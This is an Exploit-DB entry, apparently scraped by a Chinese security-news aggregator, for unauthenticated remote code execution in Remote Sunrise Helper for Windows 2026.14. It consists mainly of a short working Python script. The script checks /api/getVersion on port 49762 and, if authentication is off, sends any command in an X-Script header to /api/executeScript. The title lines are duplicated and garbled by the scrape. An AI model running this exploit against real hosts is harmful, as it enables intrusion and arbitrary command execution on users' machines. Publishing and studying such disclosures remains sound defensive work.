[local] Remote Sunrise Helper for Windows 2026.14 - Remote Code Execution
# Exploit Title: Remote Sunrise Helper for Window 2026-5-15 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏
# Exploit Title: Remote Sunrise Helper for Window 2026-5-15 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated Remote Code Execution
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
#!/usr/bin/env python3
import requests, json, sys, urllib3
urllib3.disable_warnings()
target = sys.argv[1]
cmd = sys.argv[2]
url = f"https://{target}:49762"
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
data = r.json()
if data.get("requires.auth") == False:
r = requests.post(f"{url}/api/executeScript", headers={**headers,
"X-Script": cmd}, verify=False)
result = json.loads(r.text)
print(result.get('result', result.get('error', '')))
else:
print("[*] Not vulnerable - authentication required")
文章来源: https://www.exploit-db.com/exploits/52565
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh